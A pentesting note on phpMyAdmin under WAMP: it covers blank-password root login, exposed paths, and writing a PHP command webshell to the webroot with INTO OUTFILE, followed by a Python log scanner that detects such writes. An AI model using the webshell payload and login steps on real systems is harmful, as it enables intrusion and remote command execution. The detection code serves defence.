Pentesting phpMyAdmin

phpMyAdmin often provides direct MySQL access through a web UI. If default credentials work and MySQL can write to the webroot, use INTO OUTFILE to create a webshell.

Default Login

Try root with a blank password:

Username: root
Password:

WAMP Paths

Useful exposed WAMP paths:

http://TARGET:8080/phpmyadmin/
http://TARGET:8080/add_vhost.php?lang=english

add_vhost.php can reveal that the webroot is C:\wamp\www.

phpMyAdmin to Webshell

If phpMyAdmin accepts root with a blank password, check file-write restrictions and write a PHP shell to the WAMP webroot:

SHOW VARIABLES LIKE 'secure_file_priv';
SHOW VARIABLES LIKE 'datadir';
SHOW VARIABLES LIKE 'basedir';

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\wamp\\www\\shell.php";

Trigger the shell:

Successful execution may run as nt authority\local service with SeImpersonatePrivilege enabled.
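
A defender-side check for the INTO OUTFILE write described above, as an added example that is not part of the original page: it scans MySQL query log lines for INTO OUTFILE / INTO DUMPFILE targets that land under a webroot or carry a script extension. It assumes the general query log is enabled; the webroot list, the extension set and the sample log lines are constructed for illustration.

```python
import ntpath
import re
from pathlib import PureWindowsPath

# Assumptions for this sketch: webroot taken from the page, extension list illustrative.
WEBROOTS = [PureWindowsPath(r"C:\wamp\www")]
SCRIPT_EXTS = {".php", ".phtml", ".phar"}

# SELECT ... INTO OUTFILE|DUMPFILE '<path>' with either quote style.
OUTFILE_RE = re.compile(
    r"\bINTO\s+(OUTFILE|DUMPFILE)\s+(['\"])(?P<path>(?:\\.|(?!\2).)*)\2",
    re.IGNORECASE,
)

def sql_unescape(literal):
    # Simplified MySQL string-literal unescaping: a backslash escapes the next character.
    return re.sub(r"\\(.)", r"\1", literal)

def scan(lines):
    """Return (line_no, verb, normalized_path, reasons) for risky file writes."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in OUTFILE_RE.finditer(line):
            # normpath collapses ".." and "/" so traversal cannot hide the webroot.
            target = PureWindowsPath(ntpath.normpath(sql_unescape(m.group("path"))))
            reasons = []
            # PureWindowsPath compares case-insensitively, like Windows paths.
            if any(root == target or root in target.parents for root in WEBROOTS):
                reasons.append("webroot")
            if target.suffix.lower() in SCRIPT_EXTS:
                reasons.append("script-ext")
            if reasons:
                hits.append((n, m.group(1).upper(), str(target), reasons))
    return hits

# Constructed sample in the style of a MySQL general query log (not real data).
SAMPLE_LOG = [
    r"2024-05-01T10:15:02Z 12 Query SHOW VARIABLES LIKE 'secure_file_priv'",
    r'2024-05-01T10:15:09Z 12 Query SELECT "<?php /* elided */ ?>" INTO OUTFILE "C:\\wamp\\www\\shell.php"',
    r"2024-05-01T10:16:40Z 12 Query select 1 into dumpfile 'c:/WAMP/tmp/../www/img/a.PHP'",
    r"2024-05-01T11:00:00Z 15 Query SELECT * FROM orders INTO OUTFILE 'C:\\wamp\\tmp\\orders.csv'",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The benign CSV export on the last sample line is not reported, while the forward-slash, mixed-case traversal path on the third line is normalized and flagged.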
